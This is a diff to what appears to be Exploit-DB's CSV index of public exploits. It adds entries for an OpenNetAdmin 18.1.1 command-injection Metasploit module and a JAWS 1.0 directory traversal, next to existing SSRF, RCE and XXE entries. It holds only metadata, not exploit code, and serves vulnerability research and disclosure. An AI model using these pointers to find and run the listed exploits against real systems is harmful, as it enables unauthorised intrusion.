@@ -42080,3 +42081,5 @@ id,file,description,date,author,type,platform,port
 47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
 47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
 47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,
+47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php,
+47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php,